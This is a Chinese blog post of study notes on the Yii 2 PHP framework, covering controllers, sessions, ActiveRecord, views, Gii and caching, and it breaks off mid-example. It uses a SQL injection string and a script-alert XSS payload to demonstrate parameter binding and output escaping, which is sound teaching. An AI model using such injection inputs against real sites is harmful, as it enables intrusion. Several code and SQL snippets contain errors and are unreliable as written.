---
layout: post
title: Yii 笔记
category: PHP
tags: [Yii, PHP, 框架]
---

慕课网讲 Yii 的视频还是挺有趣的，特别喜欢安全篇（本来只是点进去随便看看）。

<!-- more -->

> Yii
>
> - 「易」：极致简单与不断演变。
> - Yes it is.
>
> 借鉴
>
> - Prado：这是 Yii 的主要思想来源。Yii 采用了基于组件和事件驱动编程模式，数据库抽象层，模块化的应用 架构，国际化和本地化，和许多它的其他特点和功能。
> - Ruby on Rails：Yii 继承它的配置的思想。还引用它的 Active Record 的 ORM 设计模式。

## 基础

### 命名空间

解决命名冲突的问题。举例说明：

- a.php

``` php
<?php

class T
{
	public function funcA() {
      // do something
	}
}
```

- b.php

``` php
<?php

class T
{
	public function funcB() {
      // do something
	}
}
```

- index.php

``` php
require_once 'a.php';
require_once 'b.php';
```

如果这时候运行 index.php，就会报错:类名冲突。解决方法是使用 namespace 关键字在类文件前面加上 namespace，比如：

- a.php

```php
<?php

namespace A;

class T
{
	public function funcA() {
      // do something
	}
}
```

- b.php

``` php
<?php

namespace B;

class T
{
	public function funcB() {
      // do something
	}
}
```

由于 a.php 和 b.php 两个文件中的类 T 已经被分配到了两个不同的命名空间中，所以现在 再执行 index.php 就不会报错了。

但是，这样在实例化对象的时候，必须要在类名前带上命名空间，这给书写带来了不便，比如想要实例化 a.php 中的类 T 就需要这么写：`$a = new A\T() ;`。

解决办法是使用 use 关键字在 index.php 文件中声明使用哪个命名空间中的类 T。即：`use A\T ;` 。

这样声明后，再实例化 a.php 中的类时，就可以直接这么写：`$a = new T() ;`。

但是，这样又有一个问题，如果同时也想以声明的方式使用 b.php 中的类 T，那么使用 `use B\T;` 的话，又会出现类名冲突的错误。

解决办法是采用别名，即：`use B\T as BT;`，这样在 index.php 中实例化 b.php 中的类 T 的时候，就可以这么写：`$b = new BT() ;`。

假设该目录下还有一个文件 c.php，里面也有一个类 T，但是其前面没有使用 namespace 定义该类的命名空间，即 c.php 中的类 T 属于顶层类/全局类。

``` php
class T
{
  public function funcC() {
    // do something
  }
}
```

此时在 index.php 中引入该文件后，如果直接实例化 c.php 中的类 T，也会提示报错，因为前面在使用 a.php 中的类 T 的时候已经使用 use 关键字声明使用类 T 了。

解决之道是在实例化顶层类的时候在类名前加上反斜线 `\`，即 `$c = new \T() ;` 。index.php 中最终能正常实例化上述 3 个文件中的类 T 的代码如下：

``` php
require_once 'a.php';
require_once 'b.php';
require_once 'c.php';

use A\T;
use B\T as BT;

$a=new T();  // $a 是 a.php 中类 T 的实例化对象
$b=new BT(); // $b 是 b.php 中类 T 的实例化对象
$c=new \T(); // $c 是 c.php 中类 T 的实例化对象
```

命名空间定义时候不需要指定类名，而 use 命名空间的时候需要带上具体的类名。

### 下载安装与配置

Yii 2.0 在 PHP 5.4.0 版本以上完全重写了 Yii。它的目的是成为一个最先进的新一代的 PHP 开发框架。Yii2.0 不兼容1.1。

#### 通过 Composer

这是安装 Yii2.0 的首选方法。

``` shell
# 安装 Composer Asset 插件
php composer.phar global require "fxp/composer-asset-plugin:~1.0.0"

# 安装基本的应用程序模版
php composer.phar create-project Yiisoft/Yii2-app-basic basic 2.0.6

# 安装高级的应用程序模板
php composer.phar create-project Yiisoft/Yii2-app-advanced advanced 2.0.6

# 从旧版本升级
php composer.phar require Yiisoft/Yii2 2.0.6
```

请注意，您可能会被提示安装过程中输入你的 GitHub 的用户名和密码。这是正常的，只要输入并继续。

#### 从归档中安装

GitHub：<https://github.com/Yiisoft/Yii>。

#### 运行条件检查

解压 Yii 的归档压缩包后，将其上传到可供访问的 Web 服务器网站目录下面，输入合法的 URL 即可访问。假设在：http://localhost/basic。

接着需要检查 Yii 的运行条件：http://localhost/basic/requirements.php。

对于测试脚本测试结果中没有通过的地方，根据提示解决。

比如常见的很多 PHP 扩展没有安装，就需要根据需要和提示去 php.ini 文件中取消相应 extentions 前面的注释即可。

不过，有的扩展可能没有绑定在 PHP 主要软件包里面，需要去 PCRE 库下载 `.dll` 扩展（Windows）然后放到 /path/to/php/ext/ 目录下面。

> Yii 1.1 目前正在维护模式。
>
> Yii2.0 运行的最小需求是：PHP 5.4 以上版本。

#### 配置 Yii

##### Cookie 密钥

找到 /path/to/basic/config/web.php，在 'cookieValidationKey' 键名后面添加自定义的 value 值即可。需要该配置是为了防止 Cookie 攻 击。这个值就会被 Yii 用于对我们的 Cookie 值进行加密。

然后运行：/path/to/basic/web/index.php，就会看到 Yii 框架的标志性提示语 "Congratulations" 首页界面。至此，一个 Yii 框架驱动的 Web 应用安装成功。

### Yii 应用的静态结构

![Yii应用静态结构](http://www.Yiichina.com/docs/guide/2.0/images/application-structure.png)

其中， Yii 框架中命名空间中经常出现的 `\Yii::$app` 就是应用主体。

应用主体采用单例模式开发，在整个框架生命周期内，任何地方调用该对象都是指向同一个对象实例。

`\Yii::$app` 在 Yii 的入口程序 /path/to/web/index.php 中被创建。

> 命名空间中经常看到的 app 代表的就是 basic 目录。

### 控制器的创建和使用

Yii 2 中控制器的路径在：`/path/to/basic/controllers/`。

使用任何一种框架，都需要按照框架的规定来办事。这也是框架存在的意义之一：**规范和统一开发。**

#### 创建控制器和方法

> Tips：Yii 中默认提供的怎么写，我们就怎么写。

- 控制器文件名命名格式

首字母要大些：SiteController.php，XController.php。

这样命名后，实际的控制器名我们叫做 X 控制器

- 控制器类名命名格式：和文件名保持一致。
- 命名空间

Yii 中控制器都必须统一放在 app\controllers 中，即要这么写：`namespace app\controllers;`。

- 方法命名格式

在 Yii 中，方法被叫做操作，本质都是函数，但是命名格式有规范：action开头，然后匈牙利命名法继续。

``` php
public function actionIndex()
{
  // do something
}
```

这样命名后，实际的操作名我们叫做 Index 操作。

- 控制器类必须继承 Yii\web\Controller 中的 Controller 类

``` php
namespace app\controllers;
use Yii\web\Controller;

class HelloController extends Controller
{
  public function actionIndex() {
	echo 'Hello Yii 2';
  }
}
```

#### 调用方法（操作）的步骤

在入口脚本 /path/to/basic/web/index.php 后面添加请求参数，比如：`http://localhost/basic/web/index.php?r=xxx/indexr=控制器名/操作名` 的写法是固定的。

不过需要注意的是，虽然在命名的时候控制器名和操作名都是大写，但是在 URL 中请求的时候必须使用 小写，否则会出现 404。

#### 控制器处理请求

在没有使用框架前，我们处理一个 GET 请求直接使用的是 `$_GET['xxx']` 来获得浏览器地址栏传递过来的参数，但是在 Yii 中，最好的是借助一个请求组件 `\Yii::$app->request` 来完成。

``` php
$request = \Yii::$app->request;
echo $request->get('id', 20);
```

其中 Yii 是全局类，所以在使用该类的时候需要添加反斜线 `\`。

`get('id', 20)` 的意思是如果浏览器通过 GET 方式传递了一个名为 id 的值就会被请求组件 `$request` 的 get() 方法所获得，如果没有传递一个名为 id 的值，那么默认值为 20。

POST 方式也类似，比如：`$request->post( 'key', value );`。

`\Yii::$app->request;` 将返回一个请求组件，其本质是 Yii\web\Request 类的实例，可以赋值给一个变量，如 `$request`，请求组件中常用的方法有：

- isGet() / isPost()：判断是否是 GET / POST 方法传递过来的。
- userIp()：获取用户的 IP 地址。

还有[很多方法](http://www.Yiichina.com/doc/guide/2.0/runtime-requests )，这些方法都可以被请求组件对象所调用，比如：`request->userIp();`

#### 控制器处理响应

服务器会将浏览器发送过来的请求处理，并将处理结果打包成一个消息返回给浏览器。这个消息就叫做响应。 类似于请求处理，响应处理也需要一个响应组件 `\Yii::$app->response`。

请求组件也有[很多方法]( http://www.Yiichina.com/doc/guide/2.0/runtime-responses )，常用的方法有：

``` php
$res = \Yii::$app->response;
$res -> statusCode() = '404' ; // statusCode() 方法用于获取/设置 HTTP 事务状态码
$res -> headers() -> add( 'pragma', 'no-cache' ) ; // headers() 方法用于设置返回给浏览器的响
应头信息
$res -> headers() -> set( 'pragma', 'max-age=5' ) ;
$res -> headers() -> remove( 'pragma' ) ;
$res -> headers() -> add( 'location', 'https://github.com' ) ;
$res -> headers() -> add( 'content-disposition', 'attachment; filename="test.png"' ) ;
$res -> sendFile( './robots.txt' ) ; // 下载名为 robots.txt 的文件 如果有则操作成功; 如果没 有则抛出异常; 该函数读取的默认的文件路径在入口脚本所在路径 即 /path/to/basic/web/
```

由于页面跳转的操作十分频繁，所以 Yii 允许我们可以在 Controller 父类以及继承它的子类中直接调用 redirect() 方法：

```php
$this->redirect("https://github.com", 302);
```

#### 控制器处理 Session

和上面处理请求和相应的原理相同，在控制器中操作 SESSION 也是需要一个 session 组件。

``` php
$session = \Yii::$app->session ;
$session->open() ;     // 打开 SESSION
$session->isActive() ; // 判断 SESSION 是否开启;返回值类型为 boolean $session -> set( 'key', 'value' ) ;       // 保存键值对到 SESSION

$session->get( 'key' ) ; // 按键获得 SESSION 值
$session->remove( 'key' ) ; // 按键删除 SESSION
```

Session 的保路径在 php.ini 中指定：`session.save_path`。

除了像上面把 Session 当作对象来调用方法外，Yii 中还可以把 Session 当作数组来使用：

``` PHP
$session[ 'key' ]        // 等价于 $session->get( 'key' ) ;
unset($session['key'])   // 等价于 $session->remove( 'key' );
```

注意：服务器可以根据浏览器的不同识别 Session 属于哪个浏览器才是合法的 Session 使用者。这是根据保存浏览器中 cookie 中的 PHPSESSID 和保存在服务器端 SESSION 文件名中是否匹配来判断的。

> Chrome 里面审查元素 -> Resources -> Cookies 可以看到 PHPSESSID。

#### 控制器处理 Cookie

- 响应组件中操作 Cookie

``` php
use Yii\web\Cookie ;
$cookie = \Yii::$app->response->cookies ;
$data = array(
	'name'  => 'user' ,
	'value' => 'passwd'
);
$cookie->add( new Cooike( $data ) ); // 实例化 Cookie 对象需要引入命名空间
$cookie->remove( 'key' );
```

- 请求组件中操作 Cookie

``` php
use Yii\web\Cookie;
$cookie = \Yii::$app->request->cookies;

// 获取名为 key 的 cookie 值，第二个参数是当获取的 Cookie 名不存在作为函数 getValue() 的返回值
echo $cookie -> getValue( 'key', value );
```

- 关于 Cookie 值加密

配置 Yii 的时候我们手动输入了一个 cookieValidationKey 值，这个值就会被 Yii 用于对我们的 Cookie 值进行加密。

### 数据模型

实际项目中，视图中要输出的数据通常来自于数据库或者缓存。 Yii 的数据模型提供了对数据库的操作。

#### 数据库配置

配置文件是：/path/to/basic/config/db.php。

为了方便测试，准备一些必要的数据如下：

``` sql
create databse Yii ;
create table test(
  id int,
  title varchar(200)
) charset utf8;
insert into test values( null, title1);
insert into test values( null, title2);
```

#### 活动记录的创建

数据模型中的活动记录将用于操作数据库中的不同表的数据。一个活动记录对象最好是管理一张表（逻辑）。

- models/Test.php

``` php
namespace app\models;
use Yii\db\ActiveRecord;

class Test extends ActiveRecord
{
  // do something
}
```

数据模型文件名和数据库表名一致，表明处理的业务就是对 test 这张表进行相关操作。

#### 单表的 CRUD

创建好了活动记录之后，需要在控制器中使用该活动记录以完成对数据库测试表的增删改查操作。

这里需要将我们刚刚创建的活动记录类所在的命名空间添加到当前控制器使用。

``` php
namespace app\controllers;

use Yii\web\Controller;
use app\models\Test;

class HelloController extends Controller
{	public function actionIndex() {
		// do crud later
	}
}
```

下面的操作都是在函数 actionIndex() 中完成。

##### 查询／Read

- 传统的按 sql 语句查询

``` php
$sql = 'select * from test where id=1';
$res = Test::findBySql( $sql ) -> all();
print_r( $res );
```

这里，findBySql() 函数将执行一次 sql 查询操作，all() 方法会将本次 sql 查询得到的数 据按行封装成一个个对象保存在一个数组中并返回，因此，`$res` 代表的其实是一个含有 很多个对象的数组。

findBySql() 对防止 SQL 注入有一定的作用，因为可以在 findBySql() 函数的参数中使 用占位符(:)，强制性将传递过来的 sql 语句组成转换为合法的 sql 元素。

``` php
$sql = 'select * from test where id=:id' ;
Test::findBySql($sql, array(':id' => '1 or 1=1'))->all();
```

这样处理后，就算 sql 注入了，`'1 or 1=1'` 也会被 Yii 处理成 1 拼接到 sql 语句中。所以改动上面两行代码后浏览器的输出和不使用占位符的合法查询操作也是一样的。

- 使用 Yii 提供的查询

``` php
$res = Test::find()
  -> where( ['id' => 1] )
  -> all() ;
print_r( $res );
```

刷新浏览器可以看见和上面的输出是一样的。同理，查询 id>0 的记录的操作如下：

``` php
$res = Test::find()->where([ '>', 'id', 0 ]) -> all();

$res = Test::find()->where([ 'between', 'id', 1, 2 ]) -> all() ;

$res = Test::find()->where([ 'like', 'title', 'title1' ]) -> all() ;

print_r( count( $res ) ) ;
```

关于 where 的更多查询细节详见 [官网手册](http://www.Yiichina.com/doc/api/2.0/Yii-db-query#where()-detail)。

需要注意的是 where 中的键值列表要用中括号 [] 括起来。

- 将查询结果转换为数组

对象对内存的占用比数组高，在数据量很大的情况下造成资源浪费。所以需要将查询结果中的对象数据转换为数组。

随便用上面的查询方式之一来举例：

``` php
$res = Test::find()->where(['between', 'id', 1, 2])->asArray() -> all();
```

Yii 中将查询结果中的对象转化为数组只需使用 asArray() 这一方法就可以了，得到的输出明显比上面的精简了很多。

- 批量查询

``` php
foreach(Test::find()->batch(2) as $tests) {
  print_r(count( $res ));
}
```

batch() 函数指的是每次从数据库中查询 2 条数据并取出到内存。

这样查询数据在内存中的占用量一直保持在一个稳定的数字(这里是 2 个单位)。

##### 删除／Delete

使用活动记录 Test 删除数据库表中数据的操作如下：

``` php
// 取出并删除
$res = Test::find()->where(['id' => 1])->all();
$res[0]->delete();

// 或者直接使用活动记录对象的静态方法去删除
Test::deleteAll('id>:id', array(':id' => 0));
```

说明：deleteAll() 函数也支持占位符的方式。

##### 添加／Create

``` php
$test = new Test ;
$test -> id = 3 ;
$test -> title = 'title3' ;
$test -> save() ;
```

`$test` 这个对象会自动地识别出 id / title 是需要插入的字段，然后再调用 save() 方法将它们插入到表中去。需要注意的是，这里在向数据库插入数据之前，为了安全，可以在活动记录类中增加校验器，这样可以在一定程度上保证客户端传来的数据合法性。举例说明：

- /path/to/basic/models/Test.php

``` php
namespace app\models;

use Yii\db\ActiveRecord;

class Test extends ActiveRecord
{ // 验证器
  public function rules() {
    return [
      ['id', 'integer'],
      ['title', 'string', 'length' => [0, 10]]];
  }
}
```

- /path/to/basic/controllers/HelloController.php

``` php
namespace app\controllers;
use Yii\web\Controller;
use app\models\Test;

class HelloController extends Controller
{
  public function actionIndex() {
	$test = new Test ; $test -> id = 4 ;
	$test -> title = 'title3' ; $test -> validate() ;
	if( $test -> hasErrors() ) {
      die('data validate failed.');
	}
	$test->save();
  }
}
```

有了校验器之后，可以手动更改几个非法输入， 比如把字段 id 赋值为 string 类型的 'test'， 那么刷新浏览器后会如期输出 'data validate failed.'：

##### 修改／Update

``` php
$test = Test::find()->where(['id' => 4])->one();
$test->title = 'Hello';
$test->save();
```

#### 多表关联查询

数据准备：

``` sql
create table customer { id int, 
  name varchar( 100 ),
  primary_key( id )
} charset utf8;

insert into customer values
(null, 'A'), (null, 'B'), (null, 'C'), (null, 'D');

create table order {
	id int,
	customer_id int,
	price int,
	primary key( id )
} charset utf8 ;

insert into order values
(null, 1, 10),
(null, 2, 20),
(null, 3, 30),
(null, 4, 40),;
```

有了数据，然后分别为这两张表创建一个活动记录映射，分别用来管理这两张表。

- /path/to/basic/models/Customer.php

``` php
namespace app\models;
use Yii\db\ActiveRecord;

class Customer extends ActiveRecord
{
	// 帮助顾客获得订单信息
  	public function getOrders() {
      // $orders = $customer -> hasMany( 'app\models\Order', [ 'customer_id' => 'id' ] )->asArray()->all() ;
      // 优化上面的代码
      // $orders = $customer -> hasMany( Order::className(), [ 'customer_id' => 'id' ] )->asArray()->all() ;
      // 继续优化，因为控制器里面借助了魔术方法调用 getOrders()，但因为通过魔术方法 __get() 来调用 getOrders() 时会自动补上 all() 方法，因此，这里不再需要 all() 方法
      $orders = $customer -> hasMany( Order::className(), [ 'customer_id' => 'id' ] ) ->asArray();
      return $orders;
    }
 }
```

- /path/to/basic/models/Order.php

``` php
namespace app\models ;
use Yii\db\ActiveRecord ;
class Order extends ActiveRecord
{ 
  	// 根据订单查询顾客信息
 	public function getCustomer() {
		// 同理，这里也利用了 PHP 魔术方法 __get()，因为控制器访问了一个 Order 类 中不存在的属性，因此会出发此函数被调用，并补全 one() 方法
		return $this->hasOne(
          Customer::className(), [ 'id' => 'customer_id' ]
        )->asArray();
	}
}
```

- /path/to/basic/controllers/HelloController.php

``` php
namespace app\controllers ;

use Yii\web\Controller ;
use app\models\Test ;
use app\models\Customer.php ;
use app\models\Order.php ;

class Customer extends Controller
{
	public function actionIndex()
    {
		# 根据顾客查询订单信息: 一对多 - hasMany()
		$customer = Customer::find()->where(['name' => 'A']) -> one() ;
		// $orders = $customer -> get_orders() ;
		// 优化，利用魔术方法 __get() 自动调用 getOrders() 并补上 all() 方法 $orders = $customer -> orders ;
		print_r( $orders ) ;


		# 根据订单查询顾客信息:一对一 - hasOne()
		$order = Order::find()->where(['id' => 1]) -> one() ;
      	$customer_info = $order->customer ;
		print_r($customer_info) ;
	}
}
```

##### 关联查询性能问题

上面的例子中，在控制器的 actionIndex 方法体内进行关联查询的时候，一般有如下两个问 题影响着关联查询操作的性能。

- 关联查询的结果缓存

``` php
$customer = Customer::find()->where(['name' => 'A' ])->one() ;
$orders1  = $customer->orders ; // 这里实际上会执行一次 sql 查询: select * from order where customer_id = ...

$orders2  = $customer->orders;
```

上面的代码中，当我们第一次访问 `$customer` 的 orders 属性时，实际上会执行注释中的 sql 查询，而当我们第二次访问 `$customer` 的 orders 属性时，却不会再执行注释后面的 sql 查询 了，这是因为前面的操作 ( `$customer -> orders` ) 已经执行过一次，所以在执行相同的操作 的时候不会进行 sql 查询操作，这虽然在一定程度上提高了性能，但是当对顾客 `$customer` 进行过 update / delete 等操作的时候，数据已经变化了，但是得到的还是之前是无用数据，这明显会影响业务的正确执行。

解决办法是在进行第二次获取 `$customer` 的 orders 属性之前，先释放 `$customer` 获得的订单信息即可。即执行: `unset( $customer -> orders ) ;`

- 关联查询的多次查询

``` php
$customers = Customer::find()->all() ; // select * from customer
foreach($customers as $customer) {
	$orders = $customer->orders ;      // select * from order where cunstomer_id = ...
}
```

上面 3 行代码中的问题在于当数据量很大的时候，循环体内将会执行注释后面的 sql 查询操作非常多次，从而影响了 PHP 系统整体的性能。

解决办法是在 all() 方法之前使用 with() 方法。即：

``` php
$customers = Customer::find()->with( 'orders' )->all() ;
```

通过 with() 方法，上面循环体内注释中的 sql 查询将不再被执行，而循环之前的第一次 sql 查询后会跟上一次 sql 查询：`select * from order where customer_id in( ... ) …` 。

该查询中 in() 中的内容将是所有顾客 ID 的集合，然后把所有顾客 ID 的订单信息选取出来保存到每个顾客的 orders 属性当中。因此，foreach 循环体内将省去了数据查询的操作，极大的提升性能。

> 尽量不要再循环体内做消耗资源的操作。

### 视图管理

视图其实主要就是前端骨架。

#### 创建视图

由于一个控制器中可以调用很多个视图文件，因此，为了方便管理视图文件，Yii 规定了一个视图文件必须放在和控制器相对应的文件夹下面，即是说控制器 A 管理的视图文件必须要放在文件夹 a 下面，而 A 在 Yii 的规定中都必须放在 /path/to/basic/views/A/。

需要注意的是，控制器名为 A 的实际文件名按 Yii 规定必须是 AController.php。A 必须大写开头，但是 A 管理的视图文件是在 a 文件夹下面，即文件夹命名要小写。

举例说明，假设在 /path/to/basic/controllers/ 下有一个控制器 HelloController.php：

``` php
namespace app\controllers;

use Yii\web\Controller;

class HelloController extends Controller
{
  	public function actionIndex()
	{
		return $this->renderPartial( 'index' );
	}
}
```

假设在 `/path/to/basic/views/hello/` 下有一个视图文件 index.php，里面代码如下：

``` html
<h1>Hello Yii View</h1>
```

那么访问 http://localhost/path/to/basic/web/index.php?r=hello/index 就会打印出 'Hello Yii View'。

#### 传递渲染数据

同样是上面的控制器和视图文件，现在内容分别是：

- HelloController.php

``` php
namespace app\controllers ;
use Yii\web\Controller;
class HelloController extends Controller
{
  public function actionIndex() {
    $hello_str = 'hello str';
    // 把需要返回给视图的数据放到数组参数传递给视图文件 $data = array() ;
    $test_arr = array( 1, 2, 3 ) ;
    $data['view_hello_str']  = $hello_str;
    $data['view_test_arr'] = $test_arr;
    return $this->renderPartial('index', $data);
  }
}
```

- hello/index.php

``` html
<h1><?=$view_hello_str;?></h1>
<h1><?=$view_test_arr[1];?></h1>
```

刷新刚刚的页面，浏览器会输出 'hello str' 和 2。

可以总结一下：renderPartial() 函数是父类 Controller 的一个方法，该方法可以通过参数个数的不同完成不同的操作，当只有第一个参数的时候，就只会输出规定位置视图文件的内容，而当有 2 个参数的时候，就可以通过第二个参数将想要从控制器中传递给视图的数据传递到指定的视图文件当中去，并通过 PHP 变量的方式在视图中规定的位置输出该数据。

#### 渲染数据的安全

如果在上面的传送的数据中嵌入一段 Javascript 代码，如果不经任何处理，那么在视图被输出到浏览器的时候，也会按部就班地执行那段 Javascript 代码。

Yii 为了保证数据传输的安全，提供了一些安全措施。比如 HTML 转义，则通常需要在视图文件中进行如下处理：

``` php
<?php
use Yii\helpers\Html ;
use Yii\helpers\HtmlPurifier ;
?>
<h1><?=Html::encode( $view_hello_str );?></h1>
<h1><?=HtmlPurifier::process( $view_hello_str );?></h1>
```

如果 `$view_hello_str = "Hello Str <script>alert( 'KILL' )</script>";` 时，encode() 方法会将 `$view_hello_str` 中的 JS 代码转义，最终浏览器会输出原样 Javascript 代码。而 process() 方法会将 `$view_hello_str` 中的 JS 代码完全过滤，最终浏览器中 不会输出该 JS 代码。而若不进行任何处理，浏览器在解析该视图文件时就会弹出 "KIILL" 窗口。

#### 视图布局

为了避免书写重复代码，和 Jekyll 中 _layouts 和 _include 文件夹里面的模板文件功能完全一样。

举例说明:

- HelloController.php

``` php
namespace app\controllers ;
use Yii\web\Controller ;

class HelloController extends Controller
{
  public $layout = 'common';
  public function actionIndex()
  {
    return $this->render('index');    // $content
  }
}
```

- hello/index.php

``` html
welcome to this website.
```

- layouts/common.php

``` html
<!doctype html>
<html lang="en">
  <head>
	<meta charset="UTF-8">
	<title></title>
  </head>
<body>
  <?=$content;?>
</body>
</html>
```

此时刷新浏览器，浏览器就会输出 index.php 中的内容。

为什么说可以减少重复代码呢？

因为当有很多个视图文件存在的时候，像 common.php 中的 HTML 基本骨架等很多内容都是相同的，不同的只是 `<?=$conntent;?>` 的内容。

如果不使用 Yii 视图布局的话，那么每个视图文件的都需要书写 common.php 里面的内容，当视图文件过多的 时候，就是一个体力活了。

**编程的目的之一就是减少重复工作，或者叫 DRY。**

上面的 render() 函数的作用是将指定的视图文件的内容保存到 `$content` 这个全局变量中，因此可以在每个视图中按 Yii 的规定直接调用，同时 render() 方法会将布局文件显示出来，而显示哪个布局文件是由 `$layout` 的值决定的，在上面的例子中，layouts/common.php 的布局文件将会 被 render() 函数输出，而由于 common.php 视图中调用了全局变量 `$content`，所以 `$content` 中的内容，在上面的例子中即是 hello/index.php 中的内容，也会被输出到 common.php 中指定的任何位置。

#### 一个视图显示另一个视图

经常需要很多页面显示同一个内容，比如版权声明等等。

根据不重复的原则，版本声明等也可以单独写成一个小模块，然后等着被其他需要改模块的视图 包含输出。举例说明 Yii 中视图中包含另一个视图，其中 HelloController.php 和 common.php 的内容和上面的一样。

- hello/index.php

``` html
welcome to this website.
<?php echo $this->render('about', ['v_hello_str', 'hello another view.']);?>
```

> 这里的 `$this` 代表的就是视图组件。

- hello/about.php

``` php
About this website.
<?=$v_hello_str;?>
```

此时，刷新浏览器后就会输出：'welcome to this website.About this website.hello another view.'。

#### 视图中的数据块

数据块一般定义在视图中，等着在布局视图文件中被调用。

- HelloController.php

``` php
namespace app\controllers;
use Yii\web\Controller;

class HelloController extends Controller
{
  public $layout = 'common' ;
  public function actionIndex()
  {
	return $this->render('index');    // $content
  }
}
```

- hello/index.php

``` html
welcome to this website.

<?php $this->beginBlock( 'block' );?>
<p>this is a predefined block in index.php.</p>
<?php $this->endBlock();?>
```

- hello/about.php

``` html
About this website.
<?php $this->beginBlock( 'block' );?>
<p>this is a predefined block in about.php.</p>
<?php $this->endBlock();?>
```

- layouts/common.php

``` html
<!doctype html>
<html lang="en">
  <head>
	<meta charset="UTF-8">
	<title></title>
  </head>
<body>
  <h1><?=$content;?></h1>
	<?php if( isset( $this->blocks['block'] ) ) :?> <?=$this­>blocks['block'];?>
	<?php else:?>
	<h2>Default zone.</h2>
	<?php endif ;?>
</body>
</html>
```

如果在 Hello 控制器中使用 render() 函数显示 index.php 视图的话，浏览器就会输出：

``` html
welcome to this website

this is a predefined block in index.php
```

而如果要显示 about.php 的话，浏览器会输出：

``` html
About this website.
Default zone.
```

## 高效

### GII

> 避免 "强加的重复"？ --《程序员的修炼之道》

通过工具自动化提高开发的效率。Yii 中提供了一个名为 GII 的代码生成器。可以访问 `http://localhost/path/to/basic/web/index.php?r=gii` 使用。

GII 也是 Yii 中的一个模块，挂载在应用主体之上。

当我们访问上面的 URL 的时候， Yii 的应用主体回去自动判断 `r=` 后面的值是一个模块还是控制器，如果是控制器， 应用主体就会自动去寻找相应的控制器来处理事务，而如果是一个模块，那么应用主体就直接交给模块去管理，所以这里这么访问可以直接进入 GII 的管理首页。

#### 利用 GII 生成活动记录

"This generator generates an ActiveRecord class for the specified database table."

即是说，Model Generator 会为是数据库中的某张表生成一个活动记录类，然后通过该类来 管理这张表。

选择 Model Generator 点击 Start 进入填写如下信息：

- Table Name：你想管理哪张表就填写哪张表，这里可以智能补全，比如选择 test。
- Model Class：这里会根据 Table Name 的名字自动生成，一般不用改。
- Namespace:app\models，默认即可。
- Base Class:Yii\db\ActiveRecord，默认即可。
- Database Connection ID:Yii 中的数据库组件，默认即可。
- Use Table Prefix:是否启用表前缀。启用了可以方便识别出来自于哪个模块，同时解决了如 果模块间有相同的表名时的冲突问题。启用该选项后，生成的 Model 类中的 tableName() 方法将改变。如下：

``` php
public static function tableName() {
  return '{{%table_name}}';
}
```

Yii 会根据 config/db.php 中的 tablePrefix 字段配置的值来自动补齐表前缀。

- Generate Relations：默认开启。
- Generate Labels from DB Comments：决定了 attributeLabels() 方法中返回的字段是否是注释。-
- Enable l18N：多语言处理方案。 
- Code Template：默认即可。

Preview 无误后点击 Generate 即可生成 models\Test.php。 

注意：如果已经有 Test.php，Preview 时会提示是否 Override。

下面分析 GII 生成的 Test.php 中都有什么。

``` php
namespace app\models;

use Yii;

class Test extends \Yii\db\ActiveRecord
{
  public static function tableName() {
    return 'test' ;
  }
  # 校验规则，决定活动记录类操作表的时候是否能操作成功
  public function rules() {
    return [
	    [['title'], 'required' ] , // title 字段不能为空 而且长度不能超过 200
    	[['title'], 'string', 'max' => 200 ]
    ];
  }
  # 为 rules 提供一些报错信息或者提示信息
  public function attributeLabels() {
    return [
      'id' => 'ID' ,
      'title' => '这是一个标题' ,   // 注释即是错误信息或者提示信息
    ];
  }
}
```

以前我们使用应用主体的时候都写成 `\Yii::$app`，但是 `use Yii;` 后就可以直接写成 `Yii::$app`。

活动记录类 Test.php 创建好之后，就可以直接在控制器中使用该类中的方法去操作表 test 了。常用方法有：

- `$obj->field = $value ;`
- `$obj->save()`
- `$obj->getErrors()`

#### 利用 GII 生成控制器

同 Model Generator ，也需要先填写配置信息：

- Controller Class：控制器的命名空间+控制器类名。一般是 app\controllers\TestController 这种格式。
- Action IDs：控制器中的操作，可以创建多个，以空格分开。
- View Path：默认是 views 文件夹中和控制器名相同点文件夹。
- Base Class：一般默认，但是可以根据业务需求变动。
- Code Template：保持默认，模板会读取上述配置相来生成控制器和视图。

### 数据缓存

缓存介质可以是文件/内存/数据库。

Yii 中使用数据缓存是通过缓存组件来完成的。在 basic/config/web.php 中配置，比如：

``` php
'cache' => [
	'class' => 'Yii\caching\FileCache',
],
```

其中，FileCache 代表的就是使用文件缓存。

#### 使用数据缓存的 CRUD

``` php
# 1、获取缓存组件
$cache = \Yii::$app->cache ;

# 2、向缓存中些数据
$cache->add('key', 'hello cache.') ; // 如果 key 值已经存在，那么 add() 执行失败

# 3、当上述代码执行结束后，就可以根据需要读取缓存当中的数据
$data = $cache->get('key') ;     // get() 失败返回 false

# 4、获取缓存数据
$cache->set('key', 'hello cache 2') ;

# 5、删除某个缓存数据
$cache->delete( 'key' ) ;

# 6、清空所有缓存
$cache->flush() ;

# 7、设置缓存有效期
$cache->add( 'key', $value, 15 );    // 第三个参数的单位是秒
$cache->set( 'key', $value, 15 );
```

#### 缓存依赖

缓存依赖的意思是说当通过 add() 添加缓存数据的的时候，如果通过参数为缓存设置了相关
依赖的话，当相关依赖发生变化的时候，缓存就会失效。举例说明:

``` php
$cache = \Yii::$app -> cache;
```

#### 文件依赖

``` php
$dependency = new \Yii\caching\FileDependency( ['filename' => 'test.txt'] );
$cache->add('file_key', 'file dependency', 100, $dependency);
```

当 test.txt 文件中的内容被改动的时候，缓存过数据 file_key 就会被删除。 

#### 表达式依赖

``` php
$dependency = new \Yii\caching\ExpressionDependency(
	['expression' => '\Yii::$app -> request -> get( "name" )']
);
$cache->add('expression_key', 'expression dependency', 100, $dependency);
```

当 expression 表达式中的内容被改动的时候，比如修改浏览器传递过来的 name 值，那么
缓存过数据 expression_key 就会被删除。

#### DB 依赖

``` php
$dependency = new \Yii\caching\DbDependency([
  'sql' => 'SELECT cout(*) FROM Yii.order'
]);

$cache->add( 'db_key', 'db dependency', 100, $dependency);
```

当 sql 语句查询的结果发生改动的时候，缓存过数据 db_key 就会被删除。 

> - ChainedDependency
>
>
> - GroupDependency

### 延迟加载

延迟加载能够提高程序的执行效率。因为是需要的时候才加载。

#### 类的延迟加载

lazy_loading 核心实现：spl_autoload_register() 。

该函数的作用是告诉 PHP 解析器，当实例化类的时候如果出现找不到类文件的情况，在报错之前，会把不存在的类名当作函数参数去去执行该函数，由于事先通过该函数已经把一些其他的函数注册到程序中，因此，PHP 引擎就会去执行注册过的函数，通常那些注册过的函数里面，我们已经把包含相关类文件的操作封装好了的，当 PHP 引擎找到该类文件后，就会重新去实例化类对象。

举例说明，在同一路径下有如下 3 个文件：

- class1.php

``` php
namespace classes;

class C1 {}
```

- class2.php

``` php
